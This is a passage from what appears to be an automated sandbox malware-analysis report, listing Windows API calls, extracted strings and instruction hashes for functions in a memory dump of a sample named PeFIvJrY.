                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ErrorLast$LibraryLoad
                                • String ID: `F
                                • API String ID: 1136134869-510860190
                                • Opcode ID: f47f57870428e3a959e5f122267c765a750ff222d822601437925c15dfd1eb1d
                                • Instruction ID: 2087f70c41b8330d3df8bf3e11db7bf1f7f44cb27cb04a723847165815a2b493
                                • Opcode Fuzzy Hash: f47f57870428e3a959e5f122267c765a750ff222d822601437925c15dfd1eb1d
                                • Instruction Fuzzy Hash: 661139B52046429FD350CF1EE908B91FBE4BB94315F19C176E518C7A50D7B9D868CBA0
                                APIs
                                • HeapFree.KERNEL32(00000000,00000000,?), ref: 003E3886
                                • HeapFree.KERNEL32(00000000,00000000,?), ref: 003E38B7
                                • ___std_exception_destroy.LIBVCRUNTIME ref: 003E38D5
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: FreeHeap$___std_exception_destroy
                                • String ID: @ >
                                • API String ID: 2050543389-3678301659
                                • Opcode ID: fd3da8bc35e3547b1b4ae728200718eb7d9f2bcc84ce332d91798f15088fcee9
                                • Instruction ID: 393988ffc1b9b47d4ec7c31c2f1a56fbd0d9a3b0af153f99b3c34c20a94ce555
                                • Opcode Fuzzy Hash: fd3da8bc35e3547b1b4ae728200718eb7d9f2bcc84ce332d91798f15088fcee9
                                • Instruction Fuzzy Hash: B601A2B5601722ABE7109F62DC48B53B7A8FF41325F154228F61487690D774EC29CBE0
                                APIs
                                • InitializeCriticalSectionEx.KERNEL32(00000010,00000FA0,00000000,0000000C,004247C1,00000010,0000000C,?,003EA18F,0000000C,00000002), ref: 004244E0
                                • RtlInitializeConditionVariable.NTDLL(00000010), ref: 004244F7
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Initialize$ConditionCriticalSectionVariable
                                • String ID: CEB$NEB
                                • API String ID: 129850285-3584107315
                                • Opcode ID: 7d62dfaf48efb898ef5dbbdbdec41de52a8658aa43edea584f210ffd862b061e
                                • Instruction ID: 2445e1d36edda9d0aef9e39836c76894c73c5dc560e3d6d1445a7ac92c7ceafe
                                • Opcode Fuzzy Hash: 7d62dfaf48efb898ef5dbbdbdec41de52a8658aa43edea584f210ffd862b061e
                                • Instruction Fuzzy Hash: F8F0623530022497C7249F5CF8187E277D8D785712F844527EA4683750DBB8ED91DA8D
                                APIs
                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,003FA839), ref: 004230C6
                                • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004230D6
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AddressHandleModuleProc
                                • String ID: SetDefaultDllDirectories$kernel32.dll
                                • API String ID: 1646373207-2102062458
                                • Opcode ID: aa443b1e4c809b5b2c98d17cf1d4bfdd482d84d38df7a10389cdc4547884a320
                                • Instruction ID: dc4298ec5b8352bd939ecb59013dee50b6a2bc2f89cf2390bb6e78d5ef271f61
                                • Opcode Fuzzy Hash: aa443b1e4c809b5b2c98d17cf1d4bfdd482d84d38df7a10389cdc4547884a320
                                • Instruction Fuzzy Hash: 20D01235A407311399712B347D0A68F1B645B42B92B054462FD059A295CD7C8C5596E9
                                APIs
                                • GetCurrentProcess.KERNEL32(00000002,eB,0042EC0E,eB,0042E465,?,00000002,A05DD77D,0042E465,00000002), ref: 0042EC25
                                • TerminateProcess.KERNEL32(00000000), ref: 0042EC2C
                                • ExitProcess.KERNEL32 ref: 0042EC3E
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Process$CurrentExitTerminate
                                • String ID: eB
                                • API String ID: 1703294689-509024042
                                • Opcode ID: 199636be2903f7df62ccba64ce35ab4701828baebf4072f982f761445e976462
                                • Instruction ID: 64cfddfb5a1e7ba727ad865f33b5792221af498026435a0445903b0670d2fe56
                                • Opcode Fuzzy Hash: 199636be2903f7df62ccba64ce35ab4701828baebf4072f982f761445e976462
                                • Instruction Fuzzy Hash: C0D05E35000148AFCF002FA3FD0D9493F2AAF413407808021BA0949131CF3988619A48
                                APIs
                                • GetModuleHandleW.KERNEL32(kernelbase.dll), ref: 003E2CC8
                                • GetProcAddress.KERNEL32(00000000,RaiseFailFastException), ref: 003E2CD4
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AddressHandleModuleProc
                                • String ID: RaiseFailFastException$kernelbase.dll
                                • API String ID: 1646373207-919018592
                                • Opcode ID: c2f59fdd4c153b7119e0886f718eecdda9b74d68d97e5e06b858a4cf5eded439
                                • Instruction ID: adccd01f9c2780ad56e3df2de41056d3f8e6158e9d71a20e6c96e382942d15df
                                • Opcode Fuzzy Hash: c2f59fdd4c153b7119e0886f718eecdda9b74d68d97e5e06b858a4cf5eded439
                                • Instruction Fuzzy Hash: 6BC08C322C8348A7625067E2BC0EF3A7B4C9612B213240822FF0CC0080CFA9C47592BD
                                APIs
                                • GetLastError.KERNEL32 ref: 0041EA63
                                  • Part of subcall function 00420250: GetLastError.KERNEL32 ref: 0042028E
                                • LocalFree.KERNEL32(?), ref: 0041E9F2
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ErrorLast$FreeLocal
                                • String ID: 1.2.840.113549.1.9.6$1.3.6.1.4.1.311.3.3.1
                                • API String ID: 1627422176-1286475088
                                • Opcode ID: e8eefd33c52a691128883475ca6518ee6d8adfdde0db1e8fae7257b726657c8f
                                • Instruction ID: 7133682c02d6760a8788497dbd7dc2b782dcef2bfbf136b85f3062ef91d3978f
                                • Opcode Fuzzy Hash: e8eefd33c52a691128883475ca6518ee6d8adfdde0db1e8fae7257b726657c8f
                                • Instruction Fuzzy Hash: AE028CB4D002499FDB11CF65C880BDEFBF1BF55304F14816AD859AB382EB39A985CB94
                                APIs
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ClearVariant
                                • String ID:
                                • API String ID: 1473721057-0
                                • Opcode ID: dd0a0b48f15444ee53bb10a1840fa0a596c7832db5d8d7f2312be53eda304f1b
                                • Instruction ID: c00b50431703a6a7b107762b4d0e0d42825207bbb569273d2bb4847d28eef1f1
                                • Opcode Fuzzy Hash: dd0a0b48f15444ee53bb10a1840fa0a596c7832db5d8d7f2312be53eda304f1b
                                • Instruction Fuzzy Hash: 0EC13772A00164AFDB11DF6ADC45BAFF7A8FB48314F15826EE809A7381D735AD00CB90
                                APIs
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Variant$ClearCopyInit
                                • String ID:
                                • API String ID: 1785138364-0
                                • Opcode ID: df9829998627ace3a4291d8ef2d27352d19a961a653bdd274bd0b3084a735189
                                • Instruction ID: 9e8e1ff303356b83df5a757ad1ae68593e5f78fb02ab1fb1666b7707f18d2564
                                • Opcode Fuzzy Hash: df9829998627ace3a4291d8ef2d27352d19a961a653bdd274bd0b3084a735189
                                • Instruction Fuzzy Hash: 45B147B2A00118EFD715DF29DC46BBFB7A8EB48314F15822EE905A7391E775AC00C7A4
                                APIs
                                • GetConsoleOutputCP.KERNEL32(A05DD77D,?,00000000,?), ref: 0043202E
                                  • Part of subcall function 004319A8: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00432DDA,?,00000000,-00000008), ref: 00431A54
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00432289
                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004322D1
                                • GetLastError.KERNEL32 ref: 00432374
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                • String ID:
                                • API String ID: 2112829910-0
                                • Opcode ID: 20a5dd5b5a521f13d66b136c86c95516793057278f59a394b4d3d5eb8a3f2e6f
                                • Instruction ID: 7adeef404b3013284a84804b3ab45ee64d1a9093a14bd1e05fa1e05091aef8aa
                                • Opcode Fuzzy Hash: 20a5dd5b5a521f13d66b136c86c95516793057278f59a394b4d3d5eb8a3f2e6f
                                • Instruction Fuzzy Hash: 7CD19AB5D00248AFCF05CFA8D980AAEBBB4FF4D304F18816AE955E7351D778A942CB54
                                APIs
                                • Concurrency::cancel_current_task.LIBCPMT ref: 0040AB07
                                • GetLastError.KERNEL32(A05DD77D,?,?), ref: 0040AB86
                                • SwitchToThread.KERNEL32 ref: 0040ABC4
                                • SetLastError.KERNEL32(?,00000000), ref: 0040ACA2
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ErrorLast$Concurrency::cancel_current_taskSwitchThread
                                • String ID:
                                • API String ID: 2137634594-0
                                • Opcode ID: 9a1f028c3732a1923477028a77ebb7486d2e1c4e714153b58a1e528d2a8c1601
                                • Instruction ID: 1d29f2589c76c50169b9fff164b0a79c63c02114d14ae5022e499cb73776d13a
                                • Opcode Fuzzy Hash: 9a1f028c3732a1923477028a77ebb7486d2e1c4e714153b58a1e528d2a8c1601
                                • Instruction Fuzzy Hash: A5A10471A00205DFDB04DFA8D980AAEFBB5FF48304F24827EE915A7381D739A951CB95
                                APIs
                                • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0040C68D
                                  • Part of subcall function 00405F60: DeviceIoControl.KERNEL32(0040C674,000900EB,00000000,00000000,?,00000250,?,00000000), ref: 00405FCB
                                Strings
                                • C:\jenkins\workspace\sumer_Cardinal_aviary-sdk_master\src\trust\lib\trust_impl.cpp, xrefs: 0040C81E
                                • failed to get journal info for '%.*ls' (0x%p), xrefs: 0040C7DA
                                • trust, xrefs: 0040C7E5
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CloseControlDeviceHandle
                                • String ID: C:\jenkins\workspace\sumer_Cardinal_aviary-sdk_master\src\trust\lib\trust_impl.cpp$failed to get journal info for '%.*ls' (0x%p)$trust
                                • API String ID: 2349616827-993390907
                                • Opcode ID: 297cea5207d9336977a13670a623f00e94dbee435364dc32728e4ba6a102317a
                                • Instruction ID: 6a8019fe8826de32cdef02639b45398297f6e8d60075bd4399cd0eb1e9f87bce
                                • Opcode Fuzzy Hash: 297cea5207d9336977a13670a623f00e94dbee435364dc32728e4ba6a102317a
                                • Instruction Fuzzy Hash: D9816070D00259CBDB14DF64C885BEEB7B5BF54304F0482AAD4097B292DB799E84CF55
                                APIs
                                  • Part of subcall function 00424A98: QueryPerformanceFrequency.KERNEL32(?,00000000,?,?,?,003F69AE,?,?,?,?,?,?,?,003F9042), ref: 00424AB3
                                  • Part of subcall function 00424A81: QueryPerformanceCounter.KERNEL32(?,?,?,?,003F69BD,?,?,?,?,?,?,?,003F9042), ref: 00424A8A
                                • __alldvrm.LIBCMT ref: 003F8B9D
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003F8BD0
                                • __Xtime_get_ticks.LIBCPMT ref: 003F8C08
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003F8C8C
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: PerformanceQueryUnothrow_t@std@@@__ehfuncinfo$??2@$CounterFrequencyXtime_get_ticks__alldvrm
                                • String ID:
                                • API String ID: 3602549092-0
                                • Opcode ID: 7f4b9ac62b1d4fd778bc626d927da10332adf2e2e2cab714ce044a1efce66e09
                                • Instruction ID: 1575caa44dfbcde1ab4f81f622ab3a3fe05af0a9068f22d523995759af3e3a07
                                • Opcode Fuzzy Hash: 7f4b9ac62b1d4fd778bc626d927da10332adf2e2e2cab714ce044a1efce66e09
                                • Instruction Fuzzy Hash: EA61B371E002589FDB19DFA8C881BBEBBB4EF49314F15416EF915AB381CA749C04CB68
                                APIs
                                • __Mtx_unlock.LIBCPMT ref: 003F5AF7
                                • std::_Rethrow_future_exception.LIBCPMT ref: 003F5B44
                                • std::_Rethrow_future_exception.LIBCPMT ref: 003F5B54
                                • __Mtx_unlock.LIBCPMT ref: 003F5BF0
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Mtx_unlockRethrow_future_exceptionstd::_
                                • String ID:
                                • API String ID: 3298230783-0
                                • Opcode ID: fa0ad163e68bcdca41d19cc486d047bbcdb8a6d2e63044404cca1cfc4e26fccf
                                • Instruction ID: a393333e36e05a4f0feb7cf19f8874f4b41e4b4bb0696568e7f051a44d3da896
                                • Opcode Fuzzy Hash: fa0ad163e68bcdca41d19cc486d047bbcdb8a6d2e63044404cca1cfc4e26fccf
                                • Instruction Fuzzy Hash: 88515971D007489BDB12EBB5D806BBFBBF4EF45304F00052EE65293682EB78A944C7A1
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AdjustPointer
                                • String ID:
                                • API String ID: 1740715915-0
                                • Opcode ID: a87c4a583e402835d96f7710a16c683834cdecdb855d4d584e6a24edd489318c
                                • Instruction ID: b29c777e6eff1d30e0a062eb441ae0a313a886d53da8f0ee06b09d029998bd95
                                • Opcode Fuzzy Hash: a87c4a583e402835d96f7710a16c683834cdecdb855d4d584e6a24edd489318c
                                • Instruction Fuzzy Hash: CE5101727092269FDB298F25F841BBA77A5EF04304F94002FE90647391EB39AC41C7A9
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: EqualOffsetTypeids
                                • String ID:
                                • API String ID: 1707706676-0
                                • Opcode ID: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                                • Instruction ID: 94ae08841bebde4b5e2e6792a738c7077e03187209fc6524adda9d50b0f5bc17
                                • Opcode Fuzzy Hash: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                                • Instruction Fuzzy Hash: AB51B93594420A8FDF10CFA9C4806AEBBF0EF59320F14548BEC91A7351D33AAD28CB56
                                APIs
                                • LocalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,?,A05DD77D,00000000,?), ref: 0041C028
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AllocLocal
                                • String ID:
                                • API String ID: 3494564517-0
                                • Opcode ID: 0fbaaafb603b4b87ec813c55963fab5472bb23dc0b9b93b4e94ca07f37714a3c
                                • Instruction ID: 0c9aacf25bd8ebb3e7261d312913ec0572197d341b71f51e4d0704f3b227f0f9
                                • Opcode Fuzzy Hash: 0fbaaafb603b4b87ec813c55963fab5472bb23dc0b9b93b4e94ca07f37714a3c
                                • Instruction Fuzzy Hash: E4417CB1940209AFD710CFA9D845BDAFBF4FF08310F14822AE915A7780D7B99554CFA9
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 003E4449
                                  • Part of subcall function 003E4360: GetCurrentThreadId.KERNEL32 ref: 003E43CB
                                • GetProcessHeap.KERNEL32(00000008,000000DC), ref: 003E44A1
                                • RtlAllocateHeap.NTDLL(00000000), ref: 003E44A8
                                • GetProcessHeap.KERNEL32(00000000), ref: 003E44BF
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Heap$CurrentProcessThread$Allocate
                                • String ID:
                                • API String ID: 1247256765-0
                                • Opcode ID: 9e89936626af3dd541a3faec504f5283bb3824afc0f31107f694a6f856a57c2b
                                • Instruction ID: 14ea289f45e6db5df5db2cbe9b3cf80052b1eb6f4e733d883ded945ee0f31edd
                                • Opcode Fuzzy Hash: 9e89936626af3dd541a3faec504f5283bb3824afc0f31107f694a6f856a57c2b
                                • Instruction Fuzzy Hash: 3831E135A002609BCB29CF66E88473AB7B5EF89301F16417ADD05DB2C1EB74DC50CBA4
                                APIs
                                • RtlAcquireSRWLockExclusive.NTDLL ref: 004252C8
                                • SleepConditionVariableSRW.KERNELBASE(00000000,?,A05DD77D,00000000), ref: 004252F9
                                • RtlReleaseSRWLockExclusive.NTDLL ref: 00425333
                                • RtlReleaseSRWLockExclusive.NTDLL ref: 0042535D
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ExclusiveLock$Release$AcquireConditionSleepVariable
                                • String ID:
                                • API String ID: 3114648011-0
                                • Opcode ID: 4beafa9d1075d008f88fc0061c140760ca2382f45dbcabc87e2715147f127e74
                                • Instruction ID: 7668ab1d88927a70f4769f161a2204851164b4834b1724e2bfdc475d241125d5
                                • Opcode Fuzzy Hash: 4beafa9d1075d008f88fc0061c140760ca2382f45dbcabc87e2715147f127e74
                                • Instruction Fuzzy Hash: 88315C75A0021ADFCB04CF68D985AAEBBF4FF09310F10852AE916E3391D735A911CFA4
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: FreeLocal$ErrorLast
                                • String ID: 2.5.29.32
                                • API String ID: 4216857709-2506252730
                                • Opcode ID: 5298a67c4c264d6b6029e7f3ed27971ffb9650be0f828ca79a675ebb64653399
